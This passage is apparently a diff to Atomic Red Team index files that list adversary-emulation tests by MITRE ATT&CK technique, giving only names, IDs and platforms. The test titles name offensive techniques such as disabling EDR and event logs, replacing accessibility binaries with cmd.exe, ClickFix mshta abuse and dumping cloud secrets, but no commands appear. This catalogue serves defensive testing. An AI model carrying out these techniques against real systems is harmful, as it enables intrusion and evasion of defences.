 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,55,Disable EventLog-Application Auto Logger Session Via Registry - PowerShell,da86f239-9bd3-4e85-92ed-4a94ef111a1c,powershell
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,56,Disable EventLog-Application ETW Provider Via Registry - Cmd,1cac9b54-810e-495c-8aac-989e0076583b,command_prompt
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,57,Disable EventLog-Application ETW Provider Via Registry - PowerShell,8f907648-1ebf-4276-b0f0-e2678ca474f0,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,58,Freeze PPL-protected process with EDR-Freeze,cbb2573a-a6ad-4c87-aef8-6e175598559b,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,3,Process Hollowing in Go using CreateProcessW WinAPI,c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a,powershell
@@ -573,6 +578,8 @@ privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,6,Replace utilman.exe (Ease of Access Binary) with cmd.exe,1db380da-3422-481d-a3c8-6d5770dba580,command_prompt
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,7,Replace Magnify.exe (Magnifier binary) with cmd.exe,5e4fa70d-c789-470e-85e1-6992b92bb321,command_prompt
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,8,Replace Narrator.exe (Narrator binary) with cmd.exe,2002f5ea-cd13-4c82-bf73-e46722e5dc5e,command_prompt
+privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,9,Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe,825ba8ca-71cc-436b-b1dd-ea0d5e109086,command_prompt
+privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,10,Replace AtBroker.exe (App Switcher binary) with cmd.exe,210be7ea-d841-40ec-b3e1-ff610bb62744,command_prompt
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,2,EarlyBird APC Queue Injection in Go,73785dd2-323b-4205-ab16-bb6f06677e14,powershell
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,3,Remote Process Injection with Go using NtQueueApcThreadEx WinAPI,4cc571b1-f450-414a-850f-879baf36aa06,powershell
@@ -697,6 +704,7 @@ execution,T1204.002,User Execution: Malicious File,8,Potentially Unwanted Applic
 execution,T1204.002,User Execution: Malicious File,9,Office Generic Payload Download,5202ee05-c420-4148-bf5e-fd7f7d24850c,powershell
 execution,T1204.002,User Execution: Malicious File,10,LNK Payload Download,581d7521-9c4b-420e-9695-2aec5241167f,powershell
 execution,T1204.002,User Execution: Malicious File,11,Mirror Blast Emulation,24fd9719-7419-42dd-bce6-ab3463110b3c,powershell
+execution,T1204.002,User Execution: Malicious File,12,ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell,3f3120f0-7e50-4be2-88ae-54c61230cb9f,powershell
 execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
 execution,T1106,Native API,2,WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique,ce4e76e6-de70-4392-9efe-b281fc2b4087,powershell
 execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique,7ec5b74e-8289-4ff2-a162-b6f286a33abd,powershell
@@ -927,6 +935,8 @@ persistence,T1546.008,Event Triggered Execution: Accessibility Features,5,Auto-s
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,6,Replace utilman.exe (Ease of Access Binary) with cmd.exe,1db380da-3422-481d-a3c8-6d5770dba580,command_prompt
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,7,Replace Magnify.exe (Magnifier binary) with cmd.exe,5e4fa70d-c789-470e-85e1-6992b92bb321,command_prompt
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,8,Replace Narrator.exe (Narrator binary) with cmd.exe,2002f5ea-cd13-4c82-bf73-e46722e5dc5e,command_prompt
+persistence,T1546.008,Event Triggered Execution: Accessibility Features,9,Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe,825ba8ca-71cc-436b-b1dd-ea0d5e109086,command_prompt
+persistence,T1546.008,Event Triggered Execution: Accessibility Features,10,Replace AtBroker.exe (App Switcher binary) with cmd.exe,210be7ea-d841-40ec-b3e1-ff610bb62744,command_prompt
 persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
 persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
 persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
@@ -1074,6 +1084,7 @@ collection,T1560.001,Archive Collected Data: Archive via Utility,3,Compress Data
 collection,T1560.001,Archive Collected Data: Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt
 collection,T1560.001,Archive Collected Data: Archive via Utility,10,ESXi - Remove Syslog remote IP,36c62584-d360-41d6-886f-d194654be7c2,powershell
 collection,T1560.001,Archive Collected Data: Archive via Utility,11,Compress a File for Exfiltration using Makecab,2a7bc405-9555-4f49-ace2-b2ae2941d629,command_prompt
+collection,T1560.001,Archive Collected Data: Archive via Utility,12,Copy and Compress AppData Folder,05e8942e-f04f-460a-b560-f7781257feec,powershell
 collection,T1113,Screen Capture,7,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
 collection,T1113,Screen Capture,8,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell
 collection,T1113,Screen Capture,9,Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted,5a496325-0115-4274-8eb9-755b649ad0fb,powershell
@@ -1476,6 +1487,7 @@ impact,T1489,Service Stop,3,Windows - Stop service by killing process,f3191b84-c
 impact,T1491.001,Defacement: Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell
 impact,T1491.001,Defacement: Internal Defacement,2,Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message,ffcbfaab-c9ff-470b-928c-f086b326089b,powershell
 impact,T1491.001,Defacement: Internal Defacement,3,ESXi - Change Welcome Message on Direct Console User Interface (DCUI),30905f21-34f3-4504-8b4c-f7a5e314b810,command_prompt
+impact,T1491.001,Defacement: Internal Defacement,4,Windows - Display a simulated ransom note via Notepad (non-destructive),0eeb68ce-e64c-4420-8d53-ad5bdc6f86d5,powershell
 impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f83c-4ec5-8a08-1a56263a5bb2,command_prompt
 impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt
 impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
@@ -45,7 +45,7 @@
 - T1556.009 Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1484 Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Use Alternate Authentication Material: Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

@@ -107,7 +107,7 @@
 # lateral-movement
 - T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1021.007 Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Use Alternate Authentication Material: Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

 # execution
 - T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -10,7 +10,7 @@
 - T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1006 Direct Volume Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1564.008 Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.013 Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.013 Obfuscated Files or Information: Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1014 Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.007 Masquerading: Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -44,7 +44,7 @@
 - T1562.008 Impair Defenses: Disable Cloud Logs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1672 Email Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Use Alternate Authentication Material: Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
  - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -65,7 +65,7 @@
 - T1021.007 Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Use Alternate Authentication Material: Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

 # initial-access
 - T1566.002 Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -10,7 +10,7 @@
 - T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1006 Direct Volume Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1564.008 Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.013 Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.013 Obfuscated Files or Information: Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1014 Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.007 Masquerading: Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -51,7 +51,9 @@
 - T1666 Modify Cloud Resource Hierarchy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1564.008 Hide Artifacts: Email Hiding Rules](../../T1564.008/T1564.008.md)
  - Atomic Test #1: New-Inbox Rule to Hide E-mail in M365 [office-365]
- T1027.013 Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1027.013 Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md)
+  - Atomic Test #1: Decode Eicar File and Write to File [windows, macos, linux]
+  - Atomic Test #2: Decrypt Eicar File and Write to File [windows, macos, linux]
 - [T1014 Rootkit](../../T1014/T1014.md)
  - Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
  - Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
@@ -103,8 +105,9 @@
 - T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1218.013 Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
-  - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
+  - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory [macos, linux]
  - Atomic Test #2: Masquerade as a built-in system executable [windows]
+  - Atomic Test #3: Masquerading cmd.exe as VEDetector.exe [windows]
 - T1600 Weaken Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1564 Hide Artifacts](../../T1564/T1564.md)
@@ -226,6 +229,7 @@
  - Atomic Test #8: Hex decoding with shell utilities [linux, macos]
  - Atomic Test #9: Linux Base64 Encoded Shebang in CLI [linux, macos]
  - Atomic Test #10: XOR decoding and command execution using Python [linux, macos]
+  - Atomic Test #11: Expand CAB with expand.exe [windows]
 - [T1562 Impair Defenses](../../T1562/T1562.md)
  - Atomic Test #1: Windows Disable LSA Protection [windows]
  - Atomic Test #2: Disable journal logging via systemctl utility [linux]
@@ -667,6 +671,8 @@
  - Atomic Test #55: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell [windows]
  - Atomic Test #56: Disable EventLog-Application ETW Provider Via Registry - Cmd [windows]
  - Atomic Test #57: Disable EventLog-Application ETW Provider Via Registry - PowerShell [windows]
+  - Atomic Test #58: Freeze PPL-protected process with EDR-Freeze [windows]
+  - Atomic Test #59: Disable ASLR Via sysctl parameters - Linux [linux]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -837,9 +843,7 @@
  - Atomic Test #1: AWS - Create Snapshot from EBS Volume [iaas:aws]
  - Atomic Test #2: Azure - Create Snapshot from Managed Disk [iaas:azure]
  - Atomic Test #3: GCP - Create Snapshot from Persistent Disk [iaas:gcp]
- [T1550.001 Use Alternate Authentication Material: Application Access Token](../../T1550.001/T1550.001.md)
-  - Atomic Test #1: Azure - Functions code upload - Functions code injection via Blob upload [iaas:azure]
-  - Atomic Test #2: Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token [iaas:azure]
+- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
  - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
@@ -1084,6 +1088,8 @@
  - Atomic Test #6: Replace utilman.exe (Ease of Access Binary) with cmd.exe [windows]
  - Atomic Test #7: Replace Magnify.exe (Magnifier binary) with cmd.exe [windows]
  - Atomic Test #8: Replace Narrator.exe (Narrator binary) with cmd.exe [windows]
+  - Atomic Test #9: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe [windows]
+  - Atomic Test #10: Replace AtBroker.exe (App Switcher binary) with cmd.exe [windows]
 - [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
  - Atomic Test #1: Process Injection via C# [windows]
  - Atomic Test #2: EarlyBird APC Queue Injection in Go [windows]
@@ -1335,6 +1341,7 @@
  - Atomic Test #9: Office Generic Payload Download [windows]
  - Atomic Test #10: LNK Payload Download [windows]
  - Atomic Test #11: Mirror Blast Emulation [windows]
+  - Atomic Test #12: ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell [windows]
 - [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
  - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
  - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
@@ -1724,6 +1731,8 @@
  - Atomic Test #6: Replace utilman.exe (Ease of Access Binary) with cmd.exe [windows]
  - Atomic Test #7: Replace Magnify.exe (Magnifier binary) with cmd.exe [windows]
  - Atomic Test #8: Replace Narrator.exe (Narrator binary) with cmd.exe [windows]
+  - Atomic Test #9: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe [windows]
+  - Atomic Test #10: Replace AtBroker.exe (App Switcher binary) with cmd.exe [windows]
 - [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
  - Atomic Test #1: Create a new Windows domain admin user [windows]
  - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
@@ -2078,6 +2087,7 @@
  - Atomic Test #9: Encrypts collected data with AES-256 and Base64 [linux, macos]
  - Atomic Test #10: ESXi - Remove Syslog remote IP [windows]
  - Atomic Test #11: Compress a File for Exfiltration using Makecab [windows]
+  - Atomic Test #12: Copy and Compress AppData Folder [windows]
 - [T1113 Screen Capture](../../T1113/T1113.md)
  - Atomic Test #1: Screencapture [macos]
  - Atomic Test #2: Screencapture (silent) [macos]
@@ -2126,10 +2136,8 @@
  - Atomic Test #4: Collect Clipboard Data via VBA [windows]
  - Atomic Test #5: Add or copy content to clipboard with xClip [linux]
 - [T1530 Data from Cloud Storage Object](../../T1530/T1530.md)
-  - Atomic Test #1: Azure - Enumerate Azure Blobs with MicroBurst [iaas:azure]
-  - Atomic Test #2: Azure - Scan for Anonymous Access to Azure Storage (Powershell) [iaas:azure]
-  - Atomic Test #3: AWS - Scan for Anonymous Access to S3 [iaas:aws]
-  - Atomic Test #4: Azure - Dump Azure Storage Account Objects via Azure CLI [iaas:azure]
+  - Atomic Test #1: AWS - Scan for Anonymous Access to S3 [iaas:aws]
+  - Atomic Test #2: Azure - Dump Azure Storage Account Objects via Azure CLI [iaas:azure]
 - T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1005 Data from Local System](../../T1005/T1005.md)
  - Atomic Test #1: Search files of interest and save them to a single zip file (Windows) [windows]
@@ -2225,9 +2233,7 @@
  - Atomic Test #2: Changing RDP Port to Non Standard Port via Powershell [windows]
  - Atomic Test #3: Changing RDP Port to Non Standard Port via Command_Prompt [windows]
  - Atomic Test #4: Disable NLA for RDP via Command Prompt [windows]
- [T1550.001 Use Alternate Authentication Material: Application Access Token](../../T1550.001/T1550.001.md)
-  - Atomic Test #1: Azure - Functions code upload - Functions code injection via Blob upload [iaas:azure]
-  - Atomic Test #2: Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token [iaas:azure]
+- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

 # credential-access
 - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2433,7 +2439,8 @@
  - Atomic Test #17: Find OCI credentials [macos, linux]
 - T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1528 Steal Application Access Token](../../T1528/T1528.md)
-  - Atomic Test #1: Azure - Dump All Azure Key Vaults with Microburst [iaas:azure]
+  - Atomic Test #1: Azure - Functions code upload - Functions code injection via Blob upload [iaas:azure]
+  - Atomic Test #2: Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token [iaas:azure]
 - [T1552.006 Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md)
  - Atomic Test #1: GPP Passwords (findstr) [windows]
  - Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows]
@@ -2460,7 +2467,8 @@
 - T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.009 Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.006 Cloud Secrets Management Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1555.006 Credentials from Password Stores: Cloud Secrets Management Stores](../../T1555.006/T1555.006.md)
+  - Atomic Test #1: Azure - Dump All Azure Key Vaults with Microburst [iaas:azure]
 - [T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md)
  - Atomic Test #1: Access /etc/shadow (Local) [linux]
  - Atomic Test #2: Access /etc/master.passwd (Local) [linux]
@@ -2727,6 +2735,7 @@
  - Atomic Test #5: Simulating MAZE Directory Enumeration [windows]
  - Atomic Test #6: Launch DirLister Executable [windows]
  - Atomic Test #7: ESXi - Enumerate VMDKs available on an ESXi Host [windows]
+  - Atomic Test #8: Identifying Network Shares - Linux [linux]
 - [T1049 System Network Connections Discovery](../../T1049/T1049.md)
  - Atomic Test #1: System Network Connections Discovery [windows]
  - Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
@@ -2736,6 +2745,8 @@
 - [T1619 Cloud Storage Object Discovery](../../T1619/T1619.md)
  - Atomic Test #1: AWS S3 Enumeration [iaas:aws]
  - Atomic Test #2: Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI [iaas:azure]
+  - Atomic Test #3: Azure - Scan for Anonymous Access to Azure Storage (Powershell) [iaas:azure]
+  - Atomic Test #4: Azure - Enumerate Azure Blobs with MicroBurst [iaas:azure]
 - [T1654 Log Enumeration](../../T1654/T1654.md)
  - Atomic Test #1: Get-EventLog To Enumerate Windows Security Log [windows]
  - Atomic Test #2: Enumerate Windows Security Log via WevtUtil [windows]
@@ -2978,6 +2989,7 @@
  - Atomic Test #5: Linux - Stop service by killing process using killall [linux]
  - Atomic Test #6: Linux - Stop service by killing process using kill [linux]
  - Atomic Test #7: Linux - Stop service by killing process using pkill [linux]
+  - Atomic Test #8: Abuse of linux magic system request key for Send a SIGTERM to all processes [linux]
 - T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2989,6 +3001,7 @@
  - Atomic Test #1: Replace Desktop Wallpaper [windows]
  - Atomic Test #2: Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message [windows]
  - Atomic Test #3: ESXi - Change Welcome Message on Direct Console User Interface (DCUI) [windows]
+  - Atomic Test #4: Windows - Display a simulated ransom note via Notepad (non-destructive) [windows]
 - T1496.004 Cloud Service Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1496.001 Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -3055,6 +3068,7 @@
  - Atomic Test #13: ESXi - Terminates VMs using pkill [windows]
  - Atomic Test #14: ESXi - Avoslocker enumerates VMs and forcefully kills VMs [windows]
  - Atomic Test #15: ESXi - vim-cmd Used to Power Off VMs [windows]
+  - Atomic Test #16: Abuse of Linux Magic System Request Key for Reboot [linux]

 # initial-access
 - [T1133 External Remote Services](../../T1133/T1133.md)
@@ -10,7 +10,9 @@
 - T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1006 Direct Volume Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1564.008 Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.013 Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1027.013 Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md)
+  - Atomic Test #1: Decode Eicar File and Write to File [windows, macos, linux]
+  - Atomic Test #2: Decrypt Eicar File and Write to File [windows, macos, linux]
 - [T1014 Rootkit](../../T1014/T1014.md)
  - Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
  - Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
@@ -23,7 +25,7 @@
 - T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1218.013 Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
-  - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
+  - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory [macos, linux]
 - T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -180,6 +182,7 @@
  - Atomic Test #43: Disable Memory Swap [linux]
  - Atomic Test #47: Tamper with Defender ATP on Linux/MacOS [linux, macos]
  - Atomic Test #50: ESXi - Disable Account Lockout Policy via PowerCLI [linux]
+  - Atomic Test #59: Disable ASLR Via sysctl parameters - Linux [linux]
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -775,6 +778,7 @@
 - [T1083 File and Directory Discovery](../../T1083/T1083.md)
  - Atomic Test #3: Nix File and Directory Discovery [linux, macos]
  - Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos]
+  - Atomic Test #8: Identifying Network Shares - Linux [linux]
 - [T1049 System Network Connections Discovery](../../T1049/T1049.md)
  - Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
 - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -830,6 +834,7 @@
  - Atomic Test #5: Linux - Stop service by killing process using killall [linux]
  - Atomic Test #6: Linux - Stop service by killing process using kill [linux]
  - Atomic Test #7: Linux - Stop service by killing process using pkill [linux]
+  - Atomic Test #8: Abuse of linux magic system request key for Send a SIGTERM to all processes [linux]
 - T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -868,6 +873,7 @@
